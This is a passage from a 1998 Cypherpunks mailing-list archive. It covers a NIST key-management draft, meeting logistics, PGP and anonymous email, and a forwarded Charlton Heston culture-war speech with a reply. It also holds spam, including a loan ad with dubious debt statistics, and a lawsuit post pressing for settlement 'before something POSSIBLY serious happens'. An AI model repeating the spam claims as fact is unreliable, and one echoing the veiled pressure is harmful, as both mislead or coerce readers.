Subject: NIST Publishes Draft FIPS for FKMI
Message-ID: <199806042112.RAA12886@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The NIST Technical Advisory Committee has published its final 
draft for a FIPS for the Federal Key Management Infrastructure 
and a letter from the chairman to the Secretary of Commerce 
on the completion of the task in preparation for the final
meeting of the committee June 17-19:

   http://csrc.nist.gov/tacdfipsfkmi/ 

under the "June 1998" section

We offer mirrors of the drafts:

   http://jya.com/nist-fkmi.htm  (chairman's letter)

   http://jya.com/FIPS698.txt  (the FIPS, 222K)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@khercs.dyn.ml.org>
Date: Thu, 4 Jun 1998 19:25:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Meetings and PGP 6.0
Message-ID: <Pine.LNX.3.96.980604201116.673C-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain


Now that Network General and Network Associates (McAfee) have merged
(business wise aswell as buildings), I was wondering where the CypherPunks
meetings are going to be at the old netgen building or the new (BIG)
Network Associates (netass.com) building?  And is it still gonna be at 12
on the second saturday of the month? (seeing as this saturday(first) is
the NAI company picnic).

And, has anyone here played with PGP 6.0 (still in developement).  I hope
they do more changes in the final, Photo ID's and the misc other changes.

Thanks, Billy

-- Max Inux (MaxInux@bigfoot.com) UIN: 207447, http://khercs.dyn.ml.org
Strong Cryptography makes the world a safer place- PGP: 0x5CCFCA59
Or Kinky sex makes the world go round- Christie: Your in my sig too
^^ If Cryptography is outlawed,  only outlaws will have cryptography ^^

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Thu, 4 Jun 1998 14:10:55 -0700 (PDT)
To: Sprokkit Amhal <sprokkit@hotmail.com>
Subject: Re: anonymous mailboxes
In-Reply-To: <19980604193606.27765.qmail@hotmail.com>
Message-ID: <Pine.BSF.3.96.980604230249.3087A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain


It was not my scheme. I simply gave a presentation at HIP of a system that
was designed by a person wishing to remain anonymous.

Much of the design has changed since. I am not at liberty to discuss
futher details. The original presentation in MS
PowerPoint format is still sitting at
http://www.cypherpunks.to/~shamrock/anonmail.ppt

I have no plans to update or convert this particular presentation.

On Thu, 4 Jun 1998, Sprokkit Amhal wrote:

>    Some time ago I heard about Lucky Green's then-immature scheme for 
> anonymous email boxes, whereby a user can receive email and even a 
> traffic analysis attacker is unable to glean information about who 
> received what when.  I forget exactly what ve called vis method...
> 
> 
> 
> 
>    Is there a paper available anyplace?
> 
>    Has the scheme been validated mathematically?
> 
>    Has it been implemented?
> 
> 
> 
> 
>     ::sprokkit::
> 
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com
> 
> 


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 4 Jun 1998 22:28:27 -0700 (PDT)
To: "jf_avon@citenet.net>
Subject: Fwd: NEWS - NRA Charles Heston speech
Message-ID: <199806050537.BAA14762@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>Date: Fri, 05 Jun 1998 09:50:22 +0930
>From: SSAA <Sporting.Shooters.Association@adelaide.on.net>
>Subject: NEWS - NRA Charles Heston speech
>Organization: Sporting Shooters Association of Australia

Speech by National Rifle Association First Vice President Charlton
Heston Delivered at the Free Congress Foundation's 20th Anniversary Gala

December 7, 1997 

I like it when the party of Lincoln honors our free heritage. This
nation has been blessed by the minds and mettle of many good people, and
indeed Abe was among the best. A man of great moral character... a trait
often lacking among our leaders. This is disturbing, but not without
remedy. One good election can correct such ills.

Above all, I hope those of us gathered here tonight have more in common
with Mr. Lincoln than just party affiliation. Better that we grasp a
common vision than simply wear the cloak. Even our President pretends to
be a conservative when it suits him. We must be more than that.

I know, I know... it is not easy. Imagine being point man for the
National Rifle Association, preserving the right to keep and bear arms.
Well, I ran for office, I was elected, and now I serve... as a moving
target for pundits who've called me everything from "ridiculous" and
"duped" to a "brain-injured, senile, crazy old man."

Well, I guess that goes with the territory. But as I've stood in the
cross hairs of those who aim at Second Amendment freedom, I've realized
that guns are not the only issue, and I am not the only target. It is
much, much bigger than that  which is what I want to talk to you about.

I have come to realize that a cultural war is raging across our land...
storming our values, assaulting our freedoms, killing our 
self-confidence in who we are and what we believe, where we come from.

How many of you here own a gun? A show of hands?

How many own two or more guns?

Thank you. I wonder how many of you in this room own guns but chose not
to raise your hand? 

How many of you considered revealing your conviction about a
constitutional right, but then thought better of it?

Then you are a victim of the cultural war. You are a casualty of the
cultural warfare being waged against traditional American freedom of
beliefs and ideas.
Now maybe you don't care one way or the other about owning a gun. But I
could've asked for a show of hands on Pentecostal Christians, or
pro-lifers, or right-to-workers, or Promise Keepers, or school
voucher-ers, and the result would be the same. What if the same question
were asked at your PTA meeting? Would you raise your hand if Dan Rather
were in the back of the room there with a film crew?

See? Good. Still, if you didn't, you have been assaulted and robbed of
the courage of your convictions. Your pride in who you are, and what you
believe, has been ridiculed, ransacked, plundered. It may be a war
without bullet or bloodshed, but with just as much liberty lost: You and
your country are less free.

And you are not inconsequential people! You in this room, whom many
would say are among the most powerful people on earth, you are shamed
into silence!
Because you embrace a view at odds with the cultural warlords. If that
is the outcome of cultural war, and you are the victims, I can only ask
the gravely obvious question: What'll become of the right itself? Or
other rights not deemed acceptable by the thought police? What other
truth in your heart will you disavow with your hand?

I remember when European Jews feared to admit their faith. The Nazis
forced them to wear six-pointed yellow stars sewn on their chests as
identity badges. It worked. So what color star will they pin on our
coats? How will the self- styled elite tag us? There may not be a
Gestapo officer on every street corner yet, but the influence on our
culture is just as pervasive. 
Now, I am not really here to talk about the Second Amendment or the NRA,
but the gun issue clearly brings into focus the war that's going on.

Rank-and-file Americans wake up every morning, increasingly bewildered
and confused at why their views make them lesser citizens. After enough
breakfast- table TV promos hyping tattooed sex-slaves on the next Rikki
Lake show, enough gun-glutted movies and tabloid talk shows, enough
revisionist history books and prime-time ridicule of religion, enough of
the TV anchor who cocks her pretty head, clucks her tongue and sighs
about guns causing crime and finally the message gets through: Heaven
help the God-fearing, law-abiding, Caucasian, middle class, Protestant,
or even worse Evangelical Christian, Midwest, or Southern, or even
worse rural, apparently straight, or even worse admittedly
heterosexual, gun-owning or even worse NRA-card-carrying, average
working stiff, or even worse male working stiff, because not only don't
you count, you're a downright obstacle to social progress. Your tax
dollars may be just as delightfully green as you hand them over, but
your voice requires a lower decibel level, your opinion is less
enlightened, your media access is insignificant, and frankly mister, you
need to wake up, wise up and learn a little something about your new
America...in fact, why don't you just sit down and shut up?

That's why you don't raise your hand. That's how cultural war works. And
you are losing.

That's what happens when a generation of media, educators, entertainers
and politicians, led by a willing president, decide the America they
were born into isn't good enough any more. So they contrive to change it
through the cultural warfare of class distinction. Ask the Romans if
powerful nations have ever fallen as a result of cultural division.
There are ruins around the world that were once the smug centers of
small-minded, arrogant elitism. It appears that rather than evaporate in
the flash of a split atom, we may succumb to a divided culture.

Although my years are long, I was not on hand to help pen the Bill of
Rights. And popular assumptions aside, the same goes for the Ten
Commandments. Yet as an American and as a man who believes in God's
almighty power, I treasure both.

The Constitution was handed down to guide us by a bunch of those wise
old dead white guys who invented this country. Now, some flinch when I
say that. Why?
It's true...they were white guys. So were most of the guys who died in
Lincoln's name opposing slavery in the 1860s. So why should I be ashamed
of white guys? Why is "Hispanic pride" or "black pride" a good thing,
while "white pride" conjures up shaved heads and white hoods? Why was
the Million Man March on Washington celebrated in the media as progress,
while the Promise Keepers March on Washington was greeted with suspicion
and ridicule? I'll tell you why: Cultural warfare.

Now, Chuck Heston can get away with saying I'm proud of those wise old
dead white guys because Jesse Jackson and Louie Farrakhan know I fought
in their cultural war. I was one of the first white soldiers in the
civil rights movement in 1961, long before it was fashionable in
Hollywood believe me or in Washington for that matter. In 1963 I marched
on Washington with Dr. Martin Luther King to uphold the Bill of Rights.
I'm very proud of that. As vice- president of the NRA I am doing the
same thing.

But you don't see many other Hollywood luminaries speaking out on this
one, do you? It's not because there aren't any. It's because they can't
afford the heat. They dare not speak up for fear of CNN or the IRS or
SAG or the ATF or NBC or even W-J-C. It saps the strength of our country
when the personal price is simply too high to stand up for what you
believe in. Today, speaking with the courage of your conviction can be
so costly, the price of principle so high, that legislators won't lead
so citizens can't follow, and so there is no army to fight back. That's
cultural warfare.

For instance: It's plain that our Constitution guarantees law-abiding
citizens the right to own a firearm. But if I stand up and say so, why
does the media assault me with such a slashing, sinister brand of
derision filled with hate?

Because Bill Clinton's cultural warriors want a penitent cleansing of
firearms, as if millions of lawful gun owners should genuflect in shame
and seek absolution by surrendering their guns. That's what is now
literally happening in England and Australia, of course. Lines long
lines of submissive citizens, threatened with imprisonment, are
bitterly, reluctantly surrendering family heirlooms, guns that won their
freedom, to the blast furnace. If that fact doesn't unsettle you, then
you are already anesthetized, a ready victim of the cultural war.

You know, I think, that I stand first in line in defense of free speech.
But those who speak against the perverted and profane should be given as
much due as those who profit by it. You also know I welcome cultural
diversity. But those who choose to live on the fringe should not tear
apart the seams that secure the fabric of our society.

Now I've earned a fine and rewarding living in the motion picture
industry, yet increasingly I find myself embarrassed by the dearth of
conscience that drives the world's most influential art form. And I'm an
example of what a lonely undertaking that can be.

Nobody opposed the obscene rapper Ice-T until I stood at Time-Warner's
stockholders meeting and was ridiculed by its president for wanting to
take the floor to read Ice-T's lyrics. Since I held several hundred
shares of stock he had no choice, though the media were barred. I read
those lyrics to a stunned audience of average American people the
stockholders who were shocked at the lyrics that advocating killing
cops, sexually abusing women, and raping the nieces of our
Vice-President. True, the good guys won that time though:
Time-Warner fired Ice-T.

The gay and lesbian movement is another good example. Many homosexuals
are hugely talented artists and executives... also dear friends. I don't
despise their lifestyle, though I don't share it. As long as gay and
lesbian Americans are as productive, law-abiding and private as the rest
of us, I think America owes them absolute tolerance. It's the right
thing to do.

But on the other hand, I find my blood pressure rising when Clinton's
cultural shock troops participate in homosexual-rights fund-raisers but
boycott gun- rights fund-raisers... and then claim it's time to place
homosexual men in tents with Boy Scouts, and suggest that sperm donor
babies born into lesbian relationships are somehow better served and
more loved.

Such demands have nothing to do with equality. They're about the
currency of cultural war money and votes and the Clinton camp will let
anyone in the tent if there's a donkey on his hat, or a check in the
mail or some yen in the fortune cookie.

Mainstream America is depending on you counting on you to draw your
sword and fight for them. These people have precious little time or
resources to battle misguided Cinderella attitudes, the fringe
propaganda of the homosexual coalition, the feminists who preach that
it's a divine duty for women to hate men, blacks who raise a militant
fist with one hand while they seek preference with the other, and all
the New-Age apologists for juvenile crime, who see roving gangs as a
means of youthful expression, sex as a means of adolescent
merchandising, violence as a form of entertainment for impressionable
minds, and gun bans as a means to lord-knows-what. We've reached that
point in time when our national social policy originates on Oprah. I say
it's time to pull the plug.

Americans should not have to go to war every morning for their values.
They already go to war for their families. They fight to hold down a
job, raise responsible kids, make their payments, keep gas in the car,
put food on the table and clothes on their backs, and still save a
little for their final days in dignity. They prefer the America they
built - where you could pray without feeling naive, love without being
kinky, sing without profanity, be white without feeling guilty, own a
gun without shame, and raise your hand without apology. They are the
critical masses who find themselves under siege and are
long for you to get some guts, stand on principle and lead them to
victory in this cultural war.

Now all this sounds a little Mosaic, the punch-line of my sermon is as
elementary as the Golden Rule. In a cultural war, triumph belongs to
those who arm themselves with pride in who they are and then do the
right thing. Not the most expedient thing, not the politically correct
thing, not what'll sell, but the right thing.

And you know what? Everybody already knows what the right thing is. You,
and I, President Clinton, even Ice-T, we all know. It's easy. You say
wait a minute, you take a long look in the mirror, then into the eyes of
your kids, your grandchildren, and you'll know what's right.

Don't run for cover when the cultural cannons roar. Remember who you are
and what you believe, and then raise your hand, stand up, and speak out.
Don't be shamed or startled into lockstep conformity by seemingly
powerful people. The maintenance of a free nation is a long, slow,
steady process. And it is in your hands.

Yes, we can have rules and still have rebels that's democracy. But as
leaders you must we must do as Lincoln would do, confronted with the
stench of cultural war: Do what's right. As Mr. Lincoln said, "With
firmness in the right, as God gives us to see the right, let us finish
the work we are in... and then we shall save our country."

Defeat the criminals and their apologists, oust the biased and bigoted,
endure the undisciplined and unprincipled, but disavow the
self-appointed social engineers whose relentless arrogance fuels this
vicious war against so much we hold so dear. Do not yield, do not
divide, do not call a truce. Be fair, but fight back.

It's the same blueprint our founding fathers left to guide us. Our
enemies see it as the senile prattle of an archaic society. I still
honor it as the United States Constitution, and that timeless document
we call the Bill of Rights.

Freedom is our fortune and honor is our saving grace.

Thank you.


===================END FORWARDED MESSAGE===================


Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  JFA Technologies, R&D physicists & engineers
  Instrumentation & control, LabView programming.
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Thu, 4 Jun 1998 23:23:39 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: Re: NEWS - NRA Charles Heston speech
Message-ID: <93c4594e.35778eca@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


McVeigh is alot better than Heston (at lying-type propaganda.  I couldn't even
call McVeigh's "lying-type."  It was filled with MUCH more fact than Heston's
speech.)

The glaring over-all problem I see with his speech, is his hypocracy when it
comes to the 1st amendment (yea, I know he *claimed* to be a 1st amendments
rights supporter, BUT his actions (the rest of the speech) counters that
claim.)

Here's why they want to remove our freedom of speech.  It's because - dig this
Cypherpunks - 'The pen is mightier than the sword.'  If they take away our
ability to speak, and they keep their silly guns, guess what.  Then they have
the more powerful weapon.  And dig this - yes it IS that simple.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 5 Jun 1998 02:48:16 -0700 (PDT)
To: Max Inux <cypherpunks@toad.com
Subject: Re: Meetings and PGP 6.0
In-Reply-To: <Pine.LNX.3.96.980604201116.673C-100000@khercs.chipware.net>
Message-ID: <3.0.5.32.19980605022508.00952530@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:25 PM 6/4/98 -0700, Max Inux wrote:
>Now that Network General and Network Associates (McAfee) have merged
>(business wise aswell as buildings), I was wondering where the CypherPunks
>meetings are going to be at the old netgen building or the new (BIG)
>Network Associates (netass.com) building?  And is it still gonna be at 12
>on the second saturday of the month? (seeing as this saturday(first) is
>the NAI company picnic).

Cypherpunks meeting is almost always at the same time,
but often changes locations, depending on the availability of meeting places
and the whims of the organizers :-)  This month, we'll be meeting in
Berkeley, and as usual I'd appreciate anybody suggesting topics
they'd like to talk about there.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-news@netscape.com
Date: Fri, 5 Jun 1998 03:15:03 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Netcenter News - Volume 7
Message-ID: <199806051014.DAA03401@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  
 

Title: Netscape Netcenter News - May 1998






































Welcome to Netcenter
Netcenter is dedicated to the proposition that you should be able to find everything you need online in one place. This newsletter is one of the free benefits you receive for registering with a Netcenter program.
























Electronic commerce is creating one of the fastest growing marketplaces on the planet. Can small-scale entrepreneurs join the movement? Professional Connections Events Forum presents "E-Commerce and the Entrepreneur," featuring ZDNet's e-commerce expert Mitch Ratcliffe. 























Netscape proudly announces Netscape WebMail by USA.net, offering free web-based email accounts and value-added mail services, accessible from any computer across the globe.























CNET honors Netscape Communicator with its Readers' Choice Award for Internet Excellence, noting that it far surpasses all other Net products and browser packages on the market.














 



 

 
Enter to win a $5000 shopping spree from netMarket - the premier discount shopping club. Get guaranteed low prices and 5 percent cash back on purchases.











 





This issue of Netcenter News is brought to you by the Netscape Store.





















 



NETCENTER
EXPANDS 
BUSINESS 
CHANNEL
WITH
DEBUT
OF
NETSCAPE
SMALL
BUSINESS
SOURCE



Small Business Source is designed to provide small businesses with the latest news, information, and services online for managing and growing their businesses. Whether you simply use the Internet to conduct research or leverage it to run a business online, this unique, one-stop Internet destination provides the best and most current web-based content and services available to help small businesses succeed.

 
Launched on May 11, Small Business Source provides visitors with a wealth of free information and resources as well as easy access to leading Internet-based business tools. Did you know that a hard drive crashes every 15 seconds? With Netscape Online Backup by Atrieva, you never have to worry about your data being safe. Need to communicate or collaborate with colleagues and clients more efficiently? With Netscape Virtual Office by Netopia, you can have your own web office up and running in minutes. All the resources you'll find in Small Business Source have been tailored to meet the needs of small businesses - from news provided by NewsEdge and content from the Mining Co. to special services from Amazon.com, Travelocity, and software.net. Small Business Source is the smart choice for growing your business. Visit it today!




Want to get the latest version of Communicator? Upgrade now to Communicator 4.05, using SmartUpdate - the fast, easy, and personalized way to keep your software up-to-date. 




Need to get the message out ASAP? Get real-time communication with Netscape AOL Instant Messenger - just released for the Macintosh.





Stores closed? Tired? Curious about shopping online? Try Netcenter Marketplace. Your one stop for great deals on books, music, travel, and much more.




Thanks to everyone who took last month's small-business survey! 
Here is what you told us:



	
	
	50 percent of you buy products online 



	

	28 percent of you sell products online



	

	44 percent of you have a web page or home page for your company, while 56 percent have yet to make one



	

	the service you'd most like to see added to Netcenter is a contact manager


 


This month, tell us what you'd like in an online community!





Netscape respects your online time and Internet privacy. If you would prefer not to receive future issues, click here to to send an unsubscribe email or reply to this message with the word unsubscribe in the subject line.




Copyright (c) 1998. Netscape Communications Corporation. All rights reserved.
























From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: waekualo98@msn.com (                                                                        )
Date: Fri, 5 Jun 1998 04:45:54 -0700 (PDT)
To: waekualo98@msn.com
Subject: L@@KING FOR A FRIEND or LOVER!! NOT A SEX SITE!!
Message-ID: <199806051210ZAA212@emal2.net-serv.com>
MIME-Version: 1.0
Content-Type: text/plain


LIVE***LIVE***LIVE***LIVE***LIVE***LIVE***LIVE***LIVE

**THE INTERNETS MOST POPULAR PARY LINES!!!!!!!!

Join the Party Line!!  It's your chance to be the life of the party.  Meet new and interesting people who want to get to know you ALOT better.  Or if your preferences are a little more Intimate we have the connections for you.  1 on 1 Fantasy, talk live with the opposite sex.  
For those with a bit more spice & energy talk live with 2 count em' 2 members of the opposite sex.  
Double your pleasure & Double your fun.  

For people with a different lifestyle we have live talks for Gays & Lesbians.  You can let go and be yourself with someone who understands & shares your feelings.  Maybe you're looking to find 
that special someone who's also looking for you.  This is the safest, easiest way to connect with a new person.  Skip the meat markets & all of the guess work.  Spend your time choosing who & when, not wasting time hoping for maybe.  

Our Recorded Date Line is the key to all your dreams coming true.  We have Recorded Fantasy Lines for those who might be a little shy, or who just like to be entertained without joining in on a dialogue.  

You won't be disappointed!


1-900-993-3284

Must be 18 or older
(2.50-3.99min)
You will have the choice of anyone of the services when y




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <zenna@mail.com>
Date: Sun, 7 Jun 1998 19:23:26 -0700 (PDT)
Subject: Do you need extra money
Message-ID: <51603356@teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello:  Forgive us for the intrusion.

Let me ask you a question.  Are you in debt?

Think about that for a moment while I introduce our company.

We are American Capital Mortgage Services, we specialize
in helping homeowners establish ONE easy LOW monthly
payment with the added benefit of not needing any equity in your
home.  American Capital is constantly working with other lenders
throughout the U.S. to provide you with the best interest rate
possible.  We have a number of different companies that we work
with and this is at NO cost to you EVER.  We are
simply a referral agency.

If you answered yes to the above question, please
read on as I am sure American Capital can save you a huge amount
of money on monthly payments as well as in taxes..


Consider This.....Did you know that:

~78% of Americans are in debt...
~$5,000.00 is the average Credit Card balance...
~8 Million plus people will file Bankruptcy in
1998 alone...

Are you aware that banks throughout the United States are
pressuring Congress that people in a high tax bracket can only
file Chapter 13 so that the banks have some kind of recourse.

Let me assure you these statistics are not to scare you
but rather to inform you that you may or may not be alone.

The goal of American Capital is to provide homeowners
with lenders that fit your needs.  We can provide you with
lenders that will loan you up to 125% of the value of your
home and there is NO equity needed..  In any case there
are NO upfront fees or advances of ANY KIND on your part.
What do you have to lose, why not give it a shot and see if you
can better your situation.

Utilize the loan for whatever purpose you may need:

~ A new car
~ College tuition
~ Taxes
~ Credit Cards
~ Vacation
~ Home improvements
and the list goes on.......

You can have the cash in your pocket usually within 7-14
days.  Did you also know that your loan is tax deductible?

All we simply ask for is your name, address, phone number
and e-mail address.  The rest is optional.  This way a
representative can personally call you so he or she can answer
all your detailed questions.

For a FREE loan evaluation please,
visit our website by
CLICKING HERE
or type: www.debtmasters.as/131.html in your browser

Thank you for your time and I know that
we can help you in getting the money you deserve
and in some cases need.


TO BE REMOVED FROM OUR MAIL LIST <A HREF="http://www.ctct.com">CLICK
HERE NOW</A>


****************************************************
The mailing list for this message has been
preprocessed by an  independent service to remove
the addresses of those who are not interested in
unsolicited email. Free registration for this
mailer-independent removal service is at
http://www.ctct.com
****************************************************









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 5 Jun 1998 08:21:31 -0700 (PDT)
To: kalliste@aci.net>
Subject: twa 800, semiconductors & internet, polyforth & Java
Message-ID: <35780C56.4E5C@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday 6/5/98 9:11 AM

J Orlin Grabbe

Albuquerque Journal w 6/3/98

  TWA 800 Explosion Not on 'High Seas'

  NEW YORK - A judge said Tuesday that the TWA 800 explosion did not
occur on the "high seas," a
  ruling that could make victim eligible for additional money in their
lawsuit. against the       airline and the aircraft manufacturers. ...

http://www.aci.net/kalliste/navy800.htm and other electronic articles on
TWA 800 at http://www.aci.net/kalliste/

Albuquerque Journal f 6/5/98

  Motorola To Cut 15,000 Jobs

  No Word of Impact In Albuquerque

  The Associated Press
  CHICAGO -  Motorola Inc., struggling to weather the Asian economic
crisis, said  
  Thursday it is  eliminating 15,000 jobs over the coming 12 months.
  Profits plunged 45 percent to !180 million ...

But in the same issue

  Chip Sales Expected to Rebound

  Semiconductor Group Predicts Double-Digit Growth in 1999

  The Associated Press

  SAN JOSE, Calif.  Asia's weak economies, a slow-down in personal
computer sales and 
  an overabundance of memory chips will push own semiconductor sales
nearly 2 percent this
  year, according to an industry group.
    But those troubles are expected to ease in the second half of 1998,
boosting sales and       returning the industry to double-digit growth
next year and beyond, the Semiconductor Industry   Association said. 
    "Thanks to the unprecedented growth of Internet usage, we now expect
the industry's       expansion to occur in 1999 as semiconductor growth
rates return to their historical averages    of 17 percent or more,"
said SIA president George Scalise. ...

John Young

Albuquerque Journal f 6/5/98

  India, Pakistan Nuke Claims Exaggerated, Scientists Say
  By David S. Cloud
  Chicago Tribune
  WASHINGTON -  American scientists monitoring remote sites where India
and Pakistan detonated    nucleardevices sharply question public claims
by both nations about the size and number of      weapons tested.
    Scientists examining seismic data on the tests, picked up at
monitoring stations around the   globe, say that both India and Pakistan
have exaggerated the explosive power of the       detonations and
perhaps even the total number of devices tested.  The Clinton
administration    has similar doubts about the claims by the South Asian
rivals.
    Pakistani officials apparently disconnect a seismic monitor that
would have given outsiders   more precise data about their tests.  And
two nuclear devices that India claimed to have set    off were not
detected by a single  known seismic monitor station anywhere in the
world. ...
    The gap between the claims and the seismic data suggests that the
test may not have gone as   well as each side announced, said experts
interviewed by the Chicago Tribune.
    The discrepancies in monitoring data prove ammunition for some
critics of an international    test-ban treaty. These critics argue that
the lack of data for India's announced second round   of nuclear weapons
tests calls into question whether clandestine nuclear test can be    
accurately monitored. ...

Jim Durham, Sandia's seismic CTBT project leader
http://jya.com/da/whpda.htm, told me that the coupling [impendance
match?] between the bomb and the surrounding ground had much to do with
what a seismic station receives.

Lastly, and what I think is the most important, Albuquerque Journal f
6/5/98

  USS Yorktown Found
  Explorer Located Titanic Wreck

  By Randolph E. Schmidt

  The Associated Press

  WASHINGTON -  Three miles under water, the USS Yorktown's four-barrel
anti-aircraft gun still   aims skyward 56 years after the aircraft
carrier went to the bottom of the Pacific Ocean, a     victim of the
Battle of Midway.
    Photos and video of the giant ship, sitting upright on the ocean
floor, were unveiled       Thursday by Robert Ballard, the undersea
explorer who found the wrecks of the Titanic and the   German battleship
Bismarck.

http://www.nationalgeographic.com/features/98/midway/ 

REASON is that Ballard uses PolyForth 

  http://av.yahoo.com/bin/query?p=polyforth&z=2&hc=0&hs=0

in the submersible robots, Jeff Allsup of Woods Hole told me. 

Allsup downloaded ALL of the code and documentation from my Forth
http://jya.com/f86/whpf86.htm

book from Vesta in Colorado at 1,200 bps. 

Allsup told me this took several days.

This is same software technology  which is used for the US satellite
program. http://groucho.gsfc.nasa.gov/forth/

Java http://www.mrl.nyu.edu/meyer/jvmref/ appears also to be a byte
threaded code
technology.

Let's hope for settlement of the unfortunate matter so that we can all
got on to other constructive projects.

I would like to do some more with  

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html 

and revise

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

for the 80C32 communicating over ieee 1284 ecp to a Windows PC.

Later,
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 5 Jun 1998 19:12:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: IP: Uncle Sam is Hooked on Forfeiture (fwd)
In-Reply-To: <19980605092007.3442.qmail@hades.rpini.com>
Message-ID: <3.0.5.32.19980605092233.008e0100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Somebody, probably Vlad, forwarded this via Swiss Remailer.
I normally try not to reply to Ignition-Points forwards here,
but this one's relevant.  "Access devices" often includes things like
computer passwords as well as smartcards for building entry.
So "Crack a password, lose your computer" would apply
as well as "Crack 15+ passwords, get busted".

I don't know if that was Senator Sleazy's intent with the bill,
but it's an obvious application if not.  Did the bill pass?

>---------- Forwarded message ----------
>Date: Wed, 03 Jun 1998 16:21:31 -0400
>From: Patricia Neill <pnpj@db1.cc.rochester.edu>
>To: ignition-point@majordomo.pobox.com
>Subject: IP: Uncle Sam is Hooked on Forfeiture
>
>  4.Counterfeit Access Devices 
>          S.1148 
>          SPONSOR: Sen D'Amato (introduced 09/04/97) 
>          TITLE(S): 
>          OFFICIAL TITLE AS INTRODUCED: 
>          A bill to amend title 49, United States Code, to require the
>forfeiture of counterfeit access devices and device-making equipment. 
>               "Amends Federal transportation law to declare counterfeit
>access devices and device-making equipment  contraband subject to mandatory
>seizure and forfeiture."
>
>     Well, what are we talking about here? Duplicate key for the apartment?
>What can it be extended to tomorrow, is the real question.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 5 Jun 1998 15:19:57 -0700 (PDT)
To: bud@checkmaster.com
Subject: Site Secrets
Message-ID: <35786E62.1452@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday 6/5/98 3:49 PM

John Young

NOTHING from the court, DOE or EEOC today.

Good.

I loaded my boat in the back of my truck.

Fishing tomorrow and Sunday at Navajo lake.

Navajo lake is on the Colorado border.

My primary goal is to finish the digital FX.  But I need
a mental health break.

I got kick out of the moralist lecture to schneier@counterpane.com. 
http://www.jya.com/bud-avbsp.htm

I can only imagine "Bud" <bud@checkmaster.com>'s horror when 
he reads about Morales and my genocide, deficient crypto, and crooked
judge lawsuit.

But, of course, we are merely trying to promote settlement of this
UNFORTUNATE matter before something POSSIBLY serious happens.

Settlement progress is reported to our friends at http://www.wpiran.org/
and others in hope it is passed along to the interested.  

Peaceful MONETARY settlement of this UNFORTUNATE matter is clearly in
everyone's best interest.

Thoroughly enjoyed Site Secrets. http://www.jya.com/crypto.htm#site
The Real World again.

Have a good weekend all.
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Fri, 5 Jun 1998 21:46:38 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: Nobody on Video ;-)
Message-ID: <e40e5b22.3578c97d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


It appears the Cypherpunks have infiltrated the FBI and have installed a
survailence camera on one of the agents investigating the Cypherpunks. ;-)
Here's one of them FBI agents tryin' to track you guys down ;-) , check this
out -
http://www.cnbc.com/moreinfo/badday.mpeg

4.5 meg (but worth every byte)

Stan
'Amazing!  How can you tell the dancer from the dance' (Brave Combo - The
Jeffrey)
Visit 'What's A Meta U (and What's It 2U)
http://members.aol.com/WhtsAMetaU/

(Cypherpunks, the Brave Combo's latest studio release ('Group Dance Epidemic -
Fun .... and Functional!' - Rounder Records) is themed on my war with the
Bucketheads that led me to this list.  The cover picture depicts the
Bucketheads (a group of people pretending to be having a good time.)  It was
the leader of the Bucketheads that subscribed me to this list (I'm VERY sure).
The song, 'The Jeffrey', in particular, is all about the 'flame' (as 'they'
call it) war, and based much on some of my posts.  The list is now un-
moderated, and in the control of free persons.  Check out that cd.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Fri, 5 Jun 1998 15:21:29 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Sixty Minutes vs Pauline Hanson
